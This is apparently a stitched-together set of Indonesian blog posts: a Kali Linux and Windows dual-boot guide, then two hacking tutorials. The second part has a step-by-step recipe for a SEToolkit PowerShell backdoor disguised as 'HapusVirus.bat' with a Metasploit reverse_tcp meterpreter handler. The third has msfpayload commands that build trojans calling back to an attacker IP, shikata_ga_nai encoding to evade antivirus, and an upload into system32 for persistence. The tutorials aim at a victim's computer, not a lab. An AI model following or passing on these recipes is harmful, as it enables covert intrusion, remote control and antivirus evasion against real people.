Cara Dual Boot Kali Linux dengan Windows

Hallo world

cara install ulang atau dualboot kali linux sana 2.0 yang katanya error trus waktu install

Nah disini gw mau memberikan sedikit pengalaman gw dualboot kali linux dengan windows
oke deh gak usah banyak cingcong langsung aja

pertama download dulu iso KALI LINUX nya DISINI
cara buat bootablenya DISINI

WARNING :
ANDA HARUS MEMPUNYAI BATRAI YANG CUKUP ATAU SAMBIL DI CAS SAAT PENGINSTALAN DIKARENAKAN AGAR TIDAK TERJADI HAL YANG TIDAK DIINGINKAN

KERUSAKAN ATAU KEHILANGAN DATA BUKAN TANGGUNG JAWAB GW

Pertama buat partisi linux anda pada windows

klik kanan pada My computer > Manage

Klik Disk management
Klik kanan pada hardisk anda yang akan dibagi (Shrink volume)

pada contoh saya membagi partisi hardisk bernama "lenovo"

dan masukan Jumlah partisi yang akan anda pindah

contoh : gw membagi partisi menjadi 50Gb buat linux

jadi hitungannya yaitu :

1Gb = 1024

jadi 1024 X 50 = 51200

KET : 50 adalah Partisi 50Gb yang bakal gw pake buat linux

setelah itu akan muncul partisi baru 50Gb dengan nama UNALLOCATED berwarna hitam
jadi disini anda harus membuatnya menjadi free space
klik kanan dan lanjutkan new volume dan next next aja
Jika partisi anda berwarna biru anda harus hapus partisi 50Gb (delete volume) tadi menjadi free space
nanti partisi 50Gb yang awalnya berwarna biru berubah menjadi hijau

Jika anda berhasil di tahap ini lanjutkan ke tahap berikutnya

restart pc/laptop anda
dan masukkan flasdisk anda yang sudah dibuat bootable kali linux tadi ke pc/laptop yang bakal di dualboot

Masuk ke kali linux
kalo gak bisa masuk cari caranya di gugel cara setting BIOS buat install lewat flashdisk

Jika sudah masuk pilih Graphical install aja yang enak diliat tampilannya :v

Pilih bahasa

gw saranin pake English aja

Pilih lokasi
ahh next aja

Next lagi

Jika ada ERROR seperti berikut

cabut flashdisk anda dan pasang kembali TETAPI JANGAN MATIKAN ATAU RESTART PC/LAPTOP ANDA BIARKAN DALAM MODE ERROR

Jika Flashdisk sudah dipasang kembali

Beri tanda YES dan klik Continue

Sudah Gak ERROR lagi :v

Okeh lanjutin lagi

Disini minta load missing framework

Pilih NO dan Tekan Continue

configuration network
Continue aja

Disini mau minta jaringan
PILIH Do Not Configure The Network At This Time Dan Continue

Masukan Hostname / Nama computer anda

Contoh : REXTOR adalah nama PC/Laptop gw

Disini minta masukin password
Masukan password yang anda inginkan untuk melakukan login nanti saat boot up

WARNING...!!!!
JANGAN SAMPAI LUPA/SALAH DENGAN PASSWORD YANG ANDA MASUKAN

Pilih waktu
Continue aja

NAH..!!!
Disini anda pilih partisi yang free yang anda buat sebelumnya :D
pilih Use The Largest Continues free space dan klik continue

Pilih ALL FILES IN ONE PARTITION dan klik Continue

Disini akan terlihat
dalam kasus gw , partisi 5 & 6 adalah untuk swap dan Ext4 Linux gw
Jika menurut anda sudah benar dengan pilihan partisi anda bisa lanjutkan lagi
Pilih Finish partitioning and write changes to disk dan klik continue

Pilih YES dan klik Continue

Disini Installasi akan berjalan mungkin agak lama
Tunggu hingga selesai

Disini minta network mirror

Pilih NO dan Continue

Install Grub
karna mau di dualboot dengan windows maka
Pilih YES dan Continue

Disini kita harus memilih lokasi installasi Grub

PILIH /dev/sda dan klik Continue

Dan tunggu Installasi Grub hingga selesai disini juga lumayan lama

Installation Complete :D

Dan Restart :D

Jika sudah boot up nanti tampilan GRUB akan seperti ini

Selamat DUALBOOT ANDA SUDAH SEMPURNA :D

Untuk login

USER             : root
PASSWORD : password yang anda masukan saat instalasi tadi

Exploit Windows dengan SEToolkit dan Metasploit di Kali Linux

Dan kita pun mendapatkan sesi meterpreter

Halo teman-teman, kali ini saya akan membagikan percobaan yang saya lakukan yaitu tentang exploit windows dengan menggunakan Social Engiinering Toolkit dan Metasploit,dalamkasusini SocialEngiineringToolkithanya digunakan untuk pembuatan backdoor saja, dan Metasploit tetap sebagai tools utamanya, cara ini bukan hanya dapat digunakan di Kali Linux saja namun bisa juga menggunakan distro pentest yang lainnya asal ada metasploit dan setoolkit, baiklah langsung saja ke pembahasan.

Pertama buka terminal kali linux kalian, lalu jalankan Social Engiinering Toolkit denga n perintah

setoolkit

Nanti akan ditampilkan beberapa menu dari SetooSocial Engiinering Toolkit,
Lalu pilih yang nomor 1) Social-Engineering Attacks

Selanjutnya pilih nomor 9) Powershell Attck Vectors

Pada pilihan selanjutnya pilih nomor 1) Powershell Alphanumeric Shellcode Injector

Selanjutnya kita akan diminta untuk mengisikan IP Addres untuk listener payload, Jadi isikan IP kalian, lalu isikan port juga, disini saya gunakan port default yang sering digunakan yaitu 443, lalu Pada pertanyaan Do you want to start the listener now [yes/no]: pilih saja yang ketikkan no.

Screenshot di atas tertulis bahwa payload tersimpan pada folder /root/.set/report/powershell/, disana terdapat file dengan nama x86_powershell_injection.txt, itu merupakan backdoor yang akan digunakan, kemudian rename file tersebut dengan format .bat (biasanya folder .set ini terhidden untuk memunculkannya tekan CTRL+H)

Jika tidak ingin ribet kita dapat mengcopy dan rename dengan menggunakan perintah terminal seperti di bawah ini 

mv /root/.set/powershell/x86_powershell_injection.txt/root/Desktop/HapusVirus.bat

Nanti file tersebut akan tersimpan di  /root/Desktop dengan nama HapusVirus.bat (bisa kalian sesuaikan sendiri namanya)

Tahap selanjutnya adalah mengirimkan backdoor tersebut ke komputer target, namun sebelumnya kita buat terlebih dahulu exploitnya.

Sebelumnya jalankan service postgresql, dengan perintah

/etc/init.d/postrgresql start

Bagi yang baru pertama kali menjalankan metasploit, lanjutkan dengan perintah dibawah ini untuk membuat databse msf

msfdb init

Bagi yang sudah pernah membuatnya, bisa langsung menjalankan postgresql lalu dilanjutkan dengan membuka msfconsole

msfconsole

Lalu ketikkan perintah-perintah dibawah ini

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.103
set LPORT 443
exploit

Isikan LHOST dan LPORT sesui dengan backdoor yang di buat di atas

Oke setelah semua selesai, tinggal kita kirim backdoor tersebut ke komputer target.

Kurang lebih tampilan ketika backdoor dieksekusi oleh target akan  muncul cmd seperti di bawah ini, namun hanya sesaat dan otomatis akan tertutup

Dan kita pun mendapatkan sesi meterpreter

Perintah meterpreter untuk melihat informasi sistem target

sysinfo

Perintah meterptreter untuk remote desktop target

run vnc

Oke, itu dulu yang bisa saya bagikan mengenai Exploit Windows dengan SEToolkit dan Metasploit di Kali Linux 2.0. postingan ini di buat sebagai pengetahuan semata, segala penyalahgunaan dari postingan ini bukan tanggung jawab dari saya, Terima Kasih

Cara Membuat Trojan Di Kali Linux

hmmm , apa yang kalian lakukan jika kalian berhasil memasuki system target dan ternyata system target memahami apa yang sedang terjadi di dalam system nya ? Ouhhh pasti nya sang pemilik system akan menutup celah tersebut dan akan menyusahkan kalian , cara ini yang sering di gunakan oleh hacker untuk terus bisa masuk ke dalam system tersebut , yaitu menanam sebuah trojan atau backdoor

pengertian tentang dua hal tersebut dulu oke , apa itu trojan dan backdoor sih ??? bahas dulu Trojan terlebih dahulu oke ….

kalian pernah nonton atau pernah denger film TROY belom ??? jika belom nontonlah asik lhoo ada esex-esex nya juga hahahah , bercanda bung haha , oke sedikit cerita yaak gak seru kalau nggak ada cerita nya

pada dahulu kala ada dua kerajaan dari Yunani dan kota Troya , kerajaan yunani yang ingin menghabiskan wilayah troya menyerang dengan bala tentara yang sangat handal , sedangkan troya juga memiliki pasukan yang tidak kalah handal dalam masalah pertempuran , terjadilah perang yang sangat lama kira-kira 2 bulan sampai 3 bulanan , di akhir peperangan tersebut yunani menyerah dan mengakui kekalahan nya , pemimpin yunani membuatkan sebuah patung kuda terbuat dari kayu yang di serahkan untuk Troya , sedangkan kaum troya menghargai kekalahan lawan nya yang sudah berjuang untuk meruntuhkan tembok besar troya dan akhirnya membawa patung kuda tersebut masuk ke gerbang troya sambil melihat pasukan yunani melaut untuk pulang ke wilayah nya .

Di saat pasukan troya merayakan kemenangan kaum nya dengan membuat pesra besar-besaran di dalam wilayah troya sambil mabuk dan hura-hura dengan senang dan bergembiraria , beberapa saat kemudian penduduk dan pasukan troyapun lelah dan tertidur dengan Istri-istri nya (nggak tau istri orang ikut juga kagak :v ) dengan bangga atas kemenangan nya mereka beristirahat lelap setelah pesra kemudian ada yang berbunya aneh seperti “klutek !!!” ouuh ooo ….. ternyata kuda tersebut pecah dan di dalam nya terdapat pasukan ahli tempur milik yunani dan pasukan yang tadi nya pulang ternyata menunggu di balik pulau , pasukan yang berada di dalam kuda tersebut membuka gerbang yang kokoh dan membiarkan seluruh pasukan yunani masuk dan membumi hanguskan rakyat troya

hmmmmm bayangin aja jika server kalian yang tertanam kuda tersebut dan membuka suatu pintu yang dapat menghanguskan server kalian !? Apa kalian mau ??? :D nah cara ini ni yang biasa nya digunakan oleh para hacker untuk menghindari dari penutupan gerbang atau kelemahan yang berada di dalam server tersebut oke kita mulai membuat trojan dengan menggunakan msfconsole dan msfpayload

saat membuat trojan dan memasukan di dalam server orang lain , otomastis server tersebut memiliki antivirus yang dapat membaca file tersebut , dan disini juga di sharing tentang bagai mana caranya trojan kita tidak dapat di lacak oleh antivirus !

Langkah-langkah nya

1. membuat file trojan dengan menggunakan msfpayload yang akan melakukan koneksi ke IP kalian untuk pangkalan trojan dengan mode listening di port 4444 dalam contoh ini IP adalah 192.168.1.1 dengan port 4444 “msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 X > /tmp/trojan1.exe”

NOTE :

msfpayload windows/meterpreter/reverse_tcp (mode trojan yang kita buat adalah reverse TCP begitu file ini aktif maka akan memberikan koneksi ke IP yang ada 192.168.1.101)

LHOST=192.168.1.101 ( IP yangakan menerima koneksi untuk trojan yang kita buat tadi )

LPORT=4444 ( adalah port untuk trojan , yang akan di buka di server korban )

tmp/nama-trojan.exe ( nama trojan disini kalian bebas memberi nama trojan kalian dengan nama apa saja yang kalian mau )

naah kalau cuma seperti ini file trojan yang kalian buat sama halnya bohong membuat bom tapi tanpa penutup atau bungkusan yang membuat bom tersebut terlihat seperti bom , karna anti virus akan sangat mudah mendeteksi trojan tersebut , supaya tidak terjadi hal yang tidak di inginkan kalian bisa menggunakan msfencode untuk mempercanggih file trojan tersebut supaya tidak terdeteks oleh anti virus

2. membuat trojan lebih susah di tangkap dengan perintah “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/trojan2.exe”

NOTE:

1. Membuka sesi meterpreter.

2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 192.168.1.101 dan mendengarkan pada port 4444

3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)

4. msfencode melakukan encoding payload dengan x86/shikata_ga_nai

5. msfencode melakukan encoding dengan format ektensi .exe

6. File di beri nama trojan2.exe pada direktori /tmp/

check file nya ada atau tidak dengan menggunakan perintah berikut “ls -al /tmp”

fiuuhh jika hal ini masih saja terbaca dengan antvirus , siapa tau antiviru nya dukun dan paranoit hahaha maka kalian harus memodifikasi hallah kayak motor aja mas hehe udah nurut aja deh dengan perintah seperti berikuut ini “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -t exe > /tmp/trojan3.exe”

lihat file trojan1 – trojan3 itu virus nya yang mau di upload dengan menggunakan meterpreter , masih ingatkan cara menembus dengan msfconsole yang ada di atas hingga masuk ke sesi meterpreter ???

letikan help untuk melihat semua perintah dan kemampaun meterpreter oke , kita focus untuk upload file ke dalam komputer target dengan printah berikut ini “upload /tmp/trojan3.exe c:\\windows\\system32”

upload /tmp/trojan3.exe adalah perintah yang mana kita akan mengupload filetrojan tersebut di folder komputer target yang lokasi nya “C:\windows\system32”

yups kalian bisalihat sekarang denga perintah ls -al di meterpreter adakah file yang kita upload tadi

sukses !!! tinggal membuat dile dengan autorun yang akan menjalankan file trojan tersebut :)

Jika kurang jelas dengan tutorial yang saya posting diatas, silahkan tonton video tutorial dibawah ini :